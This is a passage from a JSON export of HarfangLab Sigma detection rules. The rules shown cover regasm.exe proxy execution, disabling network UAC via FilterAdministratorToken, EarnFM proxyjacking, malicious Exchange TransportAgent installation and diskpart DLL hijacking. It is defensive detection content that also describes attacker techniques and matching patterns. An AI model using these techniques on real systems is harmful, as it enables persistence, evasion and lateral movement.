'?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.optionsconfiguration.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threaddatabase.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threadlayer.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /register /s cgm.axilibraries.interop.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe */silent* *\\programs\\sap businessobjects\\epm add-in\\epmofficeactivex.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe stellarexcel.dll /tlb:com.stellarexcel.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /tlb /codebase robotconnectionaddin.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsprintdvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u ?:/program files/common files/wondershare/pdfelement??/preview/*/pepreview?.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\\\regasm.exe /unregister ?:/program files/atempo/tina/bin/libtina_comps_clr4.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\becpwin\\gfxgateway*.dll /regfile:*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coalaclient\\gatewaycs.dll /tlb:*\\coalaclient\\gatewaycs.tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\revao\\exe\\eic.global.interop.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\masslynx\\acquitywrapper.dll /silent /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase seedkey*.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\system32\\farpoint.spread8.excel2007.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\opentrust\\fncopentrust.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\allegoria\\classfncallegoria.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\converttopdf\\fiducial.notaire.compta.rao.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fiducialwrappermailboxplanete\\fiducial.wrappermailboxplanetecompta.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fnc_scan\\fnc_scan.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\ifiducial_fnc.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\wrapper_clotureaffaire.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm *\\ceniber\\autonet\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\diamic\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cashdrawer.dll /tlb:cls_cashdrawer.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cfd.dll /tlb:cls_cfd.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_depileuraures.dll /tlb:cls_depileuraures.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_print.dll /tlb:cls_print.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /silent *\\dedalus\\meds\\soins\\v7\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /tlb fiducial.rao.wordaddin.interop.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\batigestconnect\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\sage-paie\\declarations sociales\\client\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\b1crufl.dll /register /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\sagelcp.dll /s /nolog /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\fiducial.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\lexisnexis.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coloris\\activex\\interfacecoffrefort\\cosolucecoffrefortclient.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ecs2000.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\paie\\sagepaie\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo *\\salarior\\bus_bl\\pes\\bl.sante.interop.iparapheur.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcsmmclib.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcstraceconsole.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent ?:\\windows\\syswow64\\annoterpdf2.dll tlb ?:\\windows\\syswow64\\annoterpdf2.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent impac.mosaiq.charting.documents.mergefields.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe stange.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\\\regasm.exe stinterfaces.dll /codebase /tlb:?:\\program files (x86)\\philips\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\pacom.gms.extendedconfiguration.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.drive.drivetextserver.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.utilities.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /u *\\kansysedge\\rmp\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm fiducial.transim.comstarter.dll /codebase /tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm jdsu.fit.fiberchek.automation.dll /codebase'\n - '?:\\WINDOWS\\Microsoft.NET\\Framework*\\\\*\\regasm.exe /silent /codebase ?:\\ProgramData\\SOLIDWORKS\\\\*'\n\n exclusion_legitimate_grandparent:\n ProcessGrandparentCommandLine:\n # Ignore shares as they may often host legitimate installers\n - '\\\\\\\\*\\\\*'\n # SCCM\n - '?:\\Windows\\ccmcache\\\\*'\n # Legitimate apps\n - '?:\\Becpwin\\\\*'\n - '*\\Cosoluce\\bigjim\\Supernova.Client.BigJim.Service.exe'\n - '?:\\Windows\\Temp\\MW-????????-????-????-????-????????????\\setup_QBloc_*.exe'\n - '?:\\ProgramData\\Edisys\\SPIGAO\\iulm\\SPIGAOConnect_Setup-PROD.exe'\n\n exclusion_innosetuptools:\n CommandLine:\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n\n exclusion_lenovo:\n CommandLine:\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\\\*\\PluginsContract.dll'\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\PluginsContract.dll'\n\n exclusion_archimed_docmaker:\n ParentImage|endswith: '\\ArchimedDocMakerRegister.exe'\n CommandLine|contains: 'Achimed.DocMaker*.dll'\n\n exclusion_solu_qiq:\n ParentImage|endswith: '\\SOLU-QIQ Base *.*.*.exe'\n CommandLine|contains:\n - 'Convertisseur.dll'\n - 'ADAuthentication.dll'\n\n exclusion_wrapper_webview:\n ParentImage|endswith: 'WrapperWebView2.exe'\n ParentCommandLine|contains: '/ACTION=INSTALL'\n CommandLine|contains:\n - 'Microsoft.Web.WebView2.WinForms.tlb'\n - 'Microsoft.Web.WebView2.Core.tlb'\n\n exclusion_bat_emc:\n ParentImage|endswith: 'Setup_BAT-EMC_*.*.*.*.exe'\n CommandLine|contains:\n - 'VisuMonitoring.dll'\n - 'BatEmcBridge.dll'\n - 'SpectrogramActiveX.dll'\n\n exclusion_ivanti:\n ParentImage|endswith: '\\Ivanti20??-*\\Setup.exe'\n CommandLine|contains: 'Interop.ComUtilitiesLib.dll'\n\n exclusion_inot_office:\n ParentImage|endswith:\n - '\\GenApi.iNot.RegisterCOMComponants.exe'\n - '\\GenApi.CTI.Launcher.exe'\n CommandLine|contains:\n - '\\GenApi.iNot.Client.FramePlayer.DLL'\n - '\\GenApi.CTI.Data.iNot.dll'\n\n exclusion_fiducial:\n GrandparentImage|endswith:\n - '\\majfuposte.exe'\n - 'fncgf_evaluationprivilege.exe'\n ParentCommandLine|contains: '\\AppData\\Roaming\\fiducial\\compta\\'\n\n exclusion_water_ics:\n GrandparentImage|endswith: 'Waters\\ICS\\Companion\\ICSCompanionSvc.exe'\n ParentImage|endswith: 'Waters\\ICS\\Companion\\SetupHelper.exe'\n CommandLine|endswith: 'Waters.*.*.dll'\n\n exclusion_dolby:\n GrandparentImage|endswith: '\\DAX3API.EXE'\n ParentCommandLine|endswith: '\\DAX3APIDLL.dll'\n\n exclusion_mosaiq:\n GrandparentImage|endswith: '\\SetupMosaiq.tmp'\n ParentImage|endswith: '\\RegisterAssemblies.exe'\n\n exclusion_sage1:\n - GrandparentImage|endswith:\n - '\\Sagedirect.exe'\n - '\\SageDS_*_*_*.exe'\n - ParentCommandLine|contains:\n - '\\SageDS\\Client\\InstallShieldEnregistrementCOM.bat'\n - 'Sagedirect*.exe'\n exclusion_sage2:\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAGE SAS'\n\n exclusion_common_dlls:\n CommandLine|contains:\n - 'GenApi.iNot.*.*.dll'\n - 'GdPicture.NET.*.dll'\n\n exclusion_sap_se:\n ParentImage|endswith: '\\NwSapSetup.exe'\n CommandLine|contains:\n - 'sapnco.dll'\n - 'rscp4n.dll'\n\n exclusion_atempo:\n ParentImage: '?:\\Program Files\\Atempo\\TimeNavigator\\\\*\\Bin\\tina_*.exe'\n\n exclusion_philips:\n ParentImage:\n - '?:\\Program Files\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n - '?:\\Program Files (x86)\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n\n exclusion_sap:\n ParentImage|endswith: '\\setup\\NwSapSetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'SAP SE'\n\n exclusion_configuration_manager:\n ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\cmupdate.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_kansysedge:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\kansysedge\\installscripts\\utilities\\reregisterassemblies.bat'\n\n exclusion_genapi:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\genapi\\gupta\\i-not\\regasm_dlls.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
"rule_name": "Suspicious Proxy Execution via regasm.exe",
"rule_description": "Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\nThis may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622015Z",
"creation_date": "2026-03-23T11:45:34.622017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622021Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_filteradministratortoken.yml",
"content": "title: Network UAC Restrictions Disabled for Local Administrator\nid: 03983a13-d23e-4494-b3c5-9b24bf51acfc\ndescription: |\n Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\n By default this value is not set but adversaries may try to change it to circumvent a hardening policy.\n This will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\n It is recommended to investigate any suspicious authentication using the local administrator account.\nreferences:\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\FilterAdministratorToken'\n Details|contains: '?WORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_local_security_policy:\n ProcessImage|endswith: '\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_winoobe:\n ProcessGrandparentImage: '?:\\Windows\\System32\\setupugc.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_logmein:\n ProcessImage: '?:\\Program Files (x86)\\LogMeIn\\x64\\LogMeIn.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
"rule_name": "Network UAC Restrictions Disabled for Local Administrator",
"rule_description": "Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\nBy default this value is not set but adversaries may try to change it to circumvent a hardening policy.\nThis will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\nIt is recommended to investigate any suspicious authentication using the local administrator account.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613613Z",
"creation_date": "2026-03-23T11:45:34.613616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613624Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_earnfm.yml",
"content": "title: EarnFM Executed\nid: 039f1d5b-74b0-46d1-8a0e-dfa8bea707bd\ndescription: |\n Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.EarnFm\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' EARNFM_TOKEN='\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
"rule_name": "EarnFM Executed",
"rule_description": "Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072500Z",
"creation_date": "2026-03-23T11:45:34.072502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072506Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_new_exchange_transport_agent_powershell.yml",
"content": "title: New Exchange TransportAgent Installed via PowerShell\nid: 03a594fd-50c7-4041-9c5c-706a4009f30a\ndescription: |\n Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Install-TransportAgent '\n\n selection_assemblypath:\n PowershellCommand|contains:\n - ' -A ' # -AssemblyPath\n - ' -As ' # -AssemblyPath\n - ' -Ass ' # -AssemblyPath\n - ' -Asse ' # -AssemblyPath\n - ' -Assem ' # -AssemblyPath\n - ' -Assemb ' # -AssemblyPath\n - ' -Assembl ' # -AssemblyPath\n - ' -Assembly ' # -AssemblyPath\n - ' -AssemblyP ' # -AssemblyPath\n - ' -AssemblyPa ' # -AssemblyPath\n - ' -AssemblyPat ' # -AssemblyPath\n - ' -AssemblyPath ' # -AssemblyPath\n\n selection_transportagent:\n PowershellCommand|contains:\n - ' -T ' # -TransportAgentFactory\n - ' -Tr ' # -TransportAgentFactory\n - ' -Tra ' # -TransportAgentFactory\n - ' -Tran ' # -TransportAgentFactory\n - ' -Trans ' # -TransportAgentFactory\n - ' -Transp ' # -TransportAgentFactory\n - ' -Transpo ' # -TransportAgentFactory\n - ' -Transpor ' # -TransportAgentFactory\n - ' -Transport ' # -TransportAgentFactory\n - ' -TransportA ' # -TransportAgentFactory\n - ' -TransportAg ' # -TransportAgentFactory\n - ' -TransportAge ' # -TransportAgentFactory\n - ' -TransportAgen ' # -TransportAgentFactory\n - ' -TransportAgent ' # -TransportAgentFactory\n - ' -TransportAgentF ' # -TransportAgentFactory\n - ' -TransportAgentFa ' # -TransportAgentFactory\n - ' -TransportAgentFac ' # -TransportAgentFactory\n - ' -TransportAgentFact ' # -TransportAgentFactory\n - ' -TransportAgentFacto ' # -TransportAgentFactory\n - ' -TransportAgentFactor ' # -TransportAgentFactory\n - ' -TransportAgentFactory ' # -TransportAgentFactory\n\n exclusion_fsecure:\n PowershellCommand|contains: 'Install-TransportAgent -Name $AGENT -AssemblyPath $AGINSTDIR\\fstragnt.dll'\n\n exclusion_kaspersky:\n PowershellCommand|contains|all:\n - 'Kaspersky Security '\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Microsoft Exchange Servers\\Kse.ExchangeIntegration.Transport.dll'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Smex\\instSetupHelper.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
"rule_name": "New Exchange TransportAgent Installed via PowerShell",
"rule_description": "Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587248Z",
"creation_date": "2026-03-23T11:45:34.587252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587259Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_diskpart.yml",
"content": "title: DLL Hijacking via diskpart.exe\nid: 03d8eca6-3f1e-4d11-b989-2c6762458061\ndescription: |\n Detects potential Windows DLL Hijacking via diskpart.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n 